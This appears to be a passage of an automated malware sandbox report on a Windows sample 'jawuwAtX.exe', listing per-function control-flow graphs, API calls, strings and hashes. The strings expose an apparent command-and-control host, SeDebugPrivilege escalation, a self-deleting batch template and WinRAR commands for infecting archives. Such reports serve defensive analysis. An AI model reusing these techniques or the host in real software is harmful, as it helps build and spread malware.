                              control_flow_graph 374 322c48-322c75 memset call 321973 377 322cb2-322cb9 374->377 378 322c77-322c7f 374->378 381 322cbb-322cc2 VirtualFree 377->381 382 322cc8-322ccc 377->382 379 322c81-322c8b 378->379 380 322c8f-322cac CreateThread WaitForMultipleObjects 378->380 379->380 380->377 381->382
                              APIs
                              • memset.MSVCRT ref: 00322C57
                                • Part of subcall function 00321973: PathFileExistsA.SHLWAPI(\N2`N2,00000000,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe), ref: 00321992
                                • Part of subcall function 00321973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003219BA
                                • Part of subcall function 00321973: Sleep.KERNEL32(00000064), ref: 003219C6
                                • Part of subcall function 00321973: wsprintfA.USER32 ref: 003219EC
                                • Part of subcall function 00321973: CopyFileA.KERNEL32(?,?,00000000), ref: 00321A00
                                • Part of subcall function 00321973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00321A1E
                                • Part of subcall function 00321973: GetFileSize.KERNEL32(?,00000000), ref: 00321A2C
                                • Part of subcall function 00321973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00321A46
                                • Part of subcall function 00321973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00321A65
                              • CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00322C99
                              • WaitForMultipleObjects.KERNEL32(00000001,003216BA,00000001,000000FF,?,003216BA,00000000), ref: 00322CAC
                              • VirtualFree.KERNEL32(00F80000,00000000,00008000,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe,00324E5C,00324E60,?,003216BA,00000000), ref: 00322CC2
                              Strings
                              • C:\Users\user\AppData\Local\Temp\jawuwAtX.exe, xrefs: 00322C69
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                              • String ID: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                              • API String ID: 2042498389-3087309112
                              • Opcode ID: 6be91e90b6ff4a6b925affc3818f8cba3f21f56b061b1f1db45b13061b69c8a3
                              • Instruction ID: 39c868ed7e74fa72174b863f2076a589aa5487e34f84b36e9070fff054968bac
                              • Opcode Fuzzy Hash: 6be91e90b6ff4a6b925affc3818f8cba3f21f56b061b1f1db45b13061b69c8a3
                              • Instruction Fuzzy Hash: 2F018F716412347AE722ABA5BC0AEEF7E6CEF01B60F114114FA05D61C1D6A09A40C7F1
                              Function 003214E1 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 383 3214e1-3214fb 384 321541-321547 383->384 385 3214fd-321510 GetModuleHandleA 383->385 388 321573-321574 call 321638 384->388 389 321549-32154c 384->389 386 321512-321518 385->386 387 32151a-321535 VirtualQuery 385->387 386->384 391 321537-321539 387->391 392 32153b 387->392 395 321579-32157a ExitProcess 388->395 393 321569-321570 389->393 394 32154e-321555 389->394 391->384 391->392 392->384 394->393 396 321557-321566 call 321af9 394->396 396->393
                              APIs
                              • GetModuleHandleA.KERNEL32(00000000), ref: 00321504
                              • VirtualQuery.KERNEL32(003214E1,?,0000001C), ref: 00321525
                              • ExitProcess.KERNEL32 ref: 0032157A
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: ExitHandleModuleProcessQueryVirtual
                              • String ID:
                              • API String ID: 3946701194-0
                              • Opcode ID: 4763c1a1b11838c944d512ac8049c1e748586e9da39cebe7fc64b8162d7ddab6
                              • Instruction ID: 02523fc1b95a6e06c82c8dcfb9c474bbcaaf0f50a8219c5ed4dc16d136bf95aa
                              • Opcode Fuzzy Hash: 4763c1a1b11838c944d512ac8049c1e748586e9da39cebe7fc64b8162d7ddab6
                              • Instruction Fuzzy Hash: 6A118E71941224DFCB33DFA6B984A7D77BCEBA5710F21806EF802E6161D2349943EB60
                              Function 00321915 Relevance: 4.5, APIs: 3, Instructions: 41timeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 399 321915-321922 400 321924-321926 399->400 401 321928-32192c 399->401 404 32196e-321970 400->404 402 32192e-32194d memset GetFileTime 401->402 403 32194f-321952 401->403 405 321966-321968 402->405 403->404 406 321954-321960 SetFileTime 403->406 407 32196a 405->407 408 32196c 405->408 406->405 407->408 408->404
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: FileTimememset
                              • String ID:
                              • API String ID: 176422537-0
                              • Opcode ID: eed644b54d4ccaa280eb13fd280953efa55586b6edfa90f140c7f67542a192cc
                              • Instruction ID: edbd73f4113c256199f5551d5f8431325aa51d168386e1a5f8d1c36b98e267e6
                              • Opcode Fuzzy Hash: eed644b54d4ccaa280eb13fd280953efa55586b6edfa90f140c7f67542a192cc
                              • Instruction Fuzzy Hash: 79F06832200219BBD732DE26EC04BA777ACAB60361F11853AF516D5450E730D685DBF0
                              Function 00326158 Relevance: 2.6, APIs: 2, Instructions: 58memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 409 326158-326189 VirtualFree 410 32618c-326192 409->410 411 3260c7-3260cf 410->411 412 326198-3261b0 VirtualFree 410->412 411->410 413 3260d5-3260f8 VirtualAlloc 411->413 414 3261b2-3261b4 412->414 415 3261ba-3261c8 412->415 435 3260fa-3260fc call 3266c8 413->435 436 3260fe-326106 413->436 414->415 416 326243-326251 415->416 417 3261ca-3261d7 415->417 421 326253 416->421 422 326264-32626f 416->422 419 3261dd-3261e0 417->419 419->416 424 3261e2-3261f2 419->424 426 326255-326258 421->426 423 326271-326276 422->423 427 326389-3263b1 VirtualProtect 423->427 428 32627c-326289 423->428 429 3261f5-3261fe 424->429 426->422 431 32625a-326262 426->431 434 3263b7-3263ba 427->434 448 326292-326298 428->448 449 32628b 428->449 432 326200-326203 429->432 433 32620c-326219 429->433 431->426 438 326205-326208 432->438 439 32621b-326228 432->439 440 326238-32623f 433->440 441 3263fc-326416 VirtualProtect 434->441 442 3263bc-3263c2 434->442 435->436 444 326155-326189 VirtualFree 436->444 445 326108-32611d 436->445 450 32622a-326236 438->450 451 32620a 438->451 439->440 440->429 453 326241 440->453 458 326420-326425 441->458 459 326418-32641d 441->459 442->442 452 3263c4 442->452 444->410 446 32611f-326121 445->446 455 326123 446->455 456 326151-326154 446->456 457 3262a2-3262ac 448->457 449->448 450->440 451->440 452->441 460 3263c6-3263cf 452->460 453->419 455->456 461 326125-326128 455->461 456->444 462 3262b1-3262c8 457->462 463 3262ae 457->463 464 3263d1 460->464 465 3263d4-3263d8 460->465 466 326134-32613b 461->466 467 32612a-32612e 461->467 468 326373-326384 462->468 469 3262ce-3262d4 462->469 463->462 464->465 470 3263da 465->470 471 3263dd-3263e1 465->471 478 326130-326132 466->478 479 32613d-32614f 466->479 467->466 467->478 468->423 476 3262d6-3262d9 469->476 477 3262da-3262f1 469->477 470->471 472 3263e3 471->472 473 3263e7-3263fa VirtualProtect 471->473 472->473 473->434 473->441 476->477 481 3262f3-3262f9 477->481 482 326365-32636e 477->482 478->446 479->446 483 326314-326326 481->483 484 3262fb-32630f 481->484 482->457 486 326328-32634a 483->486 487 32634c-326360 483->487 485 326426-3264a9 484->485 495 3264ab-3264c0 485->495 496 326519-32651c 485->496 486->482 487->485 502 3264c2 495->502 503 326535-326537 495->503 497 326583-326587 496->497 498 32651d-32651e 496->498 500 326588-32658b 497->500 501 326522-326533 498->501 504 3265a1-3265a3 500->504 505 32658d-32658f 500->505 501->503 508 3264c5-3264cd 502->508 509 3264f8 502->509 506 32659a 503->506 507 326539 503->507 510 326591-326593 505->510 513 32659b-32659d 506->513 511 3265b4 507->511 512 32653b-326541 507->512 514 326542-326545 508->514 515 3264cf-3264d4 508->515 516 3264fa-3264fe 509->516 517 32656c-32656f 509->517 510->513 518 326595 510->518 523 3265be-326608 511->523 512->514 513->510 519 32659f 513->519 520 32654d-326550 514->520 521 3264d6-3264d9 515->521 522 326517-326518 515->522 524 326572 516->524 525 326500 516->525 517->524 518->506 519->500 520->523 526 326552-326556 520->526 521->520 527 3264db-3264f5 521->527 522->496 528 326573-326576 524->528 525->501 529 326502 525->529 531 326578-32657f 526->531 532 326558-326569 526->532 527->509 528->531 529->528 533 326504-326513 529->533 531->497 532->517 533->503 535 326515 533->535 535->522
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 003260DF
                              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00326189
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 003261A5
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: Virtual$Free$Alloc
                              • String ID:
                              • API String ID: 1852963964-0
                              • Opcode ID: 03d109255f2ec3bc3c8f16ad4220dd9dc3ff1cec95be8f1217d0da5c35cbf2a0
                              • Instruction ID: 32d6860df4e17176c288a5ba0db7cbea1b4a2d8cb3d0286b74f7e454ddaf71d0
                              • Opcode Fuzzy Hash: 03d109255f2ec3bc3c8f16ad4220dd9dc3ff1cec95be8f1217d0da5c35cbf2a0
                              • Instruction Fuzzy Hash: 7F118F32A00669CFCF328F58DC967DD37A1FF01300F6A4419DE8A5F692DA716954CB94

                              Non-executed Functions

                              Function 0032119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\jawuwAtX.exe,?,?,?,?,?,?,003213EF), ref: 003211AB
                              • OpenProcessToken.ADVAPI32(00000000,00000028,003213EF,?,?,?,?,?,?,003213EF), ref: 003211BB
                              • AdjustTokenPrivileges.ADVAPI32(003213EF,00000000,?,00000010,00000000,00000000), ref: 003211EB
                              • CloseHandle.KERNEL32(003213EF), ref: 003211FA
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,003213EF), ref: 00321203
                              Strings
                              • C:\Users\user\AppData\Local\Temp\jawuwAtX.exe, xrefs: 003211A5
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                              • String ID: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                              • API String ID: 75692138-3087309112
                              • Opcode ID: 17e1c294245c6c2cf8af80b117e52c30c0ba7070be3b5cf75a1b0855c259abd7
                              • Instruction ID: 6cda382a279141423f6850541c9fd7c8cce7986b5c3fbdb4cfb95c4ac1582f49
                              • Opcode Fuzzy Hash: 17e1c294245c6c2cf8af80b117e52c30c0ba7070be3b5cf75a1b0855c259abd7
                              • Instruction Fuzzy Hash: 510124B1900208EFDB11DFE4DD89AAEBBBCFF04304F108469E606A2250D7749F459B60
                              Function 0032139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                              Download Yara Rule
                              APIs
                              • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe), ref: 003213BC
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 003213DA
                              • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00321448
                                • Part of subcall function 0032119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\jawuwAtX.exe,?,?,?,?,?,?,003213EF), ref: 003211AB
                                • Part of subcall function 0032119F: OpenProcessToken.ADVAPI32(00000000,00000028,003213EF,?,?,?,?,?,?,003213EF), ref: 003211BB
                                • Part of subcall function 0032119F: AdjustTokenPrivileges.ADVAPI32(003213EF,00000000,?,00000010,00000000,00000000), ref: 003211EB
                                • Part of subcall function 0032119F: CloseHandle.KERNEL32(003213EF), ref: 003211FA
                                • Part of subcall function 0032119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,003213EF), ref: 00321203
                              Strings
                              • SeDebugPrivilege, xrefs: 003213D3
                              • C:\Users\user\AppData\Local\Temp\jawuwAtX.exe, xrefs: 003213A8
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                              • String ID: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe$SeDebugPrivilege
                              • API String ID: 4123949106-4254696666
                              • Opcode ID: 4d2a5b752bbc508ee27af7450d9263e6c5837f372b28c386ade49817bbb3af71
                              • Instruction ID: a1dfc62d68e24cc6ef1953fc794a909e20c4ddbc4b3db92ef6462c0878094c74
                              • Opcode Fuzzy Hash: 4d2a5b752bbc508ee27af7450d9263e6c5837f372b28c386ade49817bbb3af71
                              • Instruction Fuzzy Hash: 7431D771D00229EADF22EFA6EE45FEFBB78EB54700F21406AE604B6140D7305E45CB60
                              Function 00326D00 Relevance: .2, Instructions: 218COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                              • Instruction ID: b3afde08f6bed5f881dcc89be0c2a5eeee48eca6a5dbd10ab9cb8fa071d570d0
                              • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                              • Instruction Fuzzy Hash: 3081D271214B518FC729CF28E8916AAB7E2EFC5314F148A2DD0EAC7B55DB34E809CB44
                              Function 0032239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON
                              Download Yara Rule
                              APIs
                              • strstr.MSVCRT ref: 003223CC
                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00322464
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00322472
                              • CloseHandle.KERNEL32(?,00000000,00000000), ref: 003224A8
                              • memset.MSVCRT ref: 003224B9
                              • strrchr.MSVCRT ref: 003224C9
                              • wsprintfA.USER32 ref: 003224DE
                              • strrchr.MSVCRT ref: 003224ED
                              • memset.MSVCRT ref: 003224F2
                              • memset.MSVCRT ref: 00322505
                              • wsprintfA.USER32 ref: 00322524
                              • Sleep.KERNEL32(000007D0), ref: 00322535
                              • Sleep.KERNEL32(000007D0), ref: 0032255D
                              • memset.MSVCRT ref: 0032256E
                              • wsprintfA.USER32 ref: 00322585
                              • memset.MSVCRT ref: 003225A6
                              • wsprintfA.USER32 ref: 003225CA
                              • Sleep.KERNEL32(000007D0), ref: 003225D0
                              • Sleep.KERNEL32(000007D0,?,?), ref: 003225E5
                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003225FC
                              • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00322611
                              • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00322642
                              • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0032265B
                              • SetEndOfFile.KERNEL32 ref: 0032266D
                              • CloseHandle.KERNEL32(00000000), ref: 00322676
                              • RemoveDirectoryA.KERNEL32(?), ref: 00322681
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                              • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                              • API String ID: 2203340711-774930870
                              • Opcode ID: 02e3b3b9825a92dc6e493dc23ade260a4981e18166217256324179605ffb615f
                              • Instruction ID: d736c5492a38b635992968dea8212b1c5f33300338208e47ed433d03e3a8569c
                              • Opcode Fuzzy Hash: 02e3b3b9825a92dc6e493dc23ade260a4981e18166217256324179605ffb615f
                              • Instruction Fuzzy Hash: D381A0B2504314BBD722DF60EC49EABB7ACFF88714F00491EF645D21A0D7749A498BA6
                              Function 0032274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00322766
                              • memset.MSVCRT ref: 00322774
                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00322787
                              • wsprintfA.USER32 ref: 003227AB
                                • Part of subcall function 0032185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,00321118), ref: 00321867
                                • Part of subcall function 0032185B: srand.MSVCRT ref: 00321878
                                • Part of subcall function 0032185B: rand.MSVCRT ref: 00321880
                                • Part of subcall function 0032185B: srand.MSVCRT ref: 00321890
                                • Part of subcall function 0032185B: rand.MSVCRT ref: 00321894
                              • wsprintfA.USER32 ref: 003227C6
                              • CopyFileA.KERNEL32(?,00324C80,00000000), ref: 003227D4
                              • wsprintfA.USER32 ref: 003227F4
                                • Part of subcall function 00321973: PathFileExistsA.SHLWAPI(\N2`N2,00000000,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe), ref: 00321992
                                • Part of subcall function 00321973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003219BA
                                • Part of subcall function 00321973: Sleep.KERNEL32(00000064), ref: 003219C6
                                • Part of subcall function 00321973: wsprintfA.USER32 ref: 003219EC
                                • Part of subcall function 00321973: CopyFileA.KERNEL32(?,?,00000000), ref: 00321A00
                                • Part of subcall function 00321973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00321A1E
                                • Part of subcall function 00321973: GetFileSize.KERNEL32(?,00000000), ref: 00321A2C
                                • Part of subcall function 00321973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00321A46
                                • Part of subcall function 00321973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00321A65
                              • DeleteFileA.KERNEL32(?,?,00324E54,00324E58), ref: 0032281A
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00324E54,00324E58), ref: 00322832
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                              • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                              • API String ID: 692489704-3099098879
                              • Opcode ID: 9f9555d6f63364a27ea091357ad5e509de1c0e75f9a67d11152ede126504c5f5
                              • Instruction ID: c294f5c119c0adbeb68356ca9172344c34c273c0f198eff750fa76649448f6f6
                              • Opcode Fuzzy Hash: 9f9555d6f63364a27ea091357ad5e509de1c0e75f9a67d11152ede126504c5f5
                              • Instruction Fuzzy Hash: 7C2130B694033C7BEB12E7A4BD89EEB776CEB14754F0005A5F645E2041E674DF848AB0
                              Function 00321581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0032185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,00321118), ref: 00321867
                                • Part of subcall function 0032185B: srand.MSVCRT ref: 00321878
                                • Part of subcall function 0032185B: rand.MSVCRT ref: 00321880
                                • Part of subcall function 0032185B: srand.MSVCRT ref: 00321890
                                • Part of subcall function 0032185B: rand.MSVCRT ref: 00321894
                              • wsprintfA.USER32 ref: 003215AA
                              • wsprintfA.USER32 ref: 003215C6
                              • lstrlen.KERNEL32(?), ref: 003215D2
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 003215EE
                              • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00321609
                              • CloseHandle.KERNEL32(00000000), ref: 00321612
                              • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0032162D
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                              • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\jawuwAtX.exe$open
                              • API String ID: 617340118-1123926669
                              • Opcode ID: 8bad05ccdaaf56f69882d4f2941e83b6589fa909c058049e10b9726ecb2f3196
                              • Instruction ID: bb360945e3f404b004d4411075f6042f08d7951c5bc94030567ae8aa9b574ce1
                              • Opcode Fuzzy Hash: 8bad05ccdaaf56f69882d4f2941e83b6589fa909c058049e10b9726ecb2f3196
                              • Instruction Fuzzy Hash: 311173B6A011387BD722A7A4AC89DEB7B6CEF59750F000051F94AE2040DA74AB85CBB0
                              Function 0032120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00321400), ref: 00321226
                              • GetProcAddress.KERNEL32(00000000), ref: 0032122D
                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00321400), ref: 0032123F
                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00321400), ref: 00321250
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe,?,?,?,?,00321400), ref: 0032129E
                              • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe,?,?,?,?,00321400), ref: 003212B0
                              • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe,?,?,?,?,00321400), ref: 003212F5
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00321400), ref: 0032130A
                              Strings
                              • ntdll.dll, xrefs: 00321219
                              • ZwQuerySystemInformation, xrefs: 00321212
                              • C:\Users\user\AppData\Local\Temp\jawuwAtX.exe, xrefs: 00321262
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                              • String ID: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe$ZwQuerySystemInformation$ntdll.dll
                              • API String ID: 1500695312-3029884969
                              • Opcode ID: 028957f4c95032e802e353f1906c966e7bba826a4dfd5831b256846def512dcb
                              • Instruction ID: 7d226d33c09505f9db7efae94e91f6ed13ed23d70c036b6e5ec1a9647d78449e
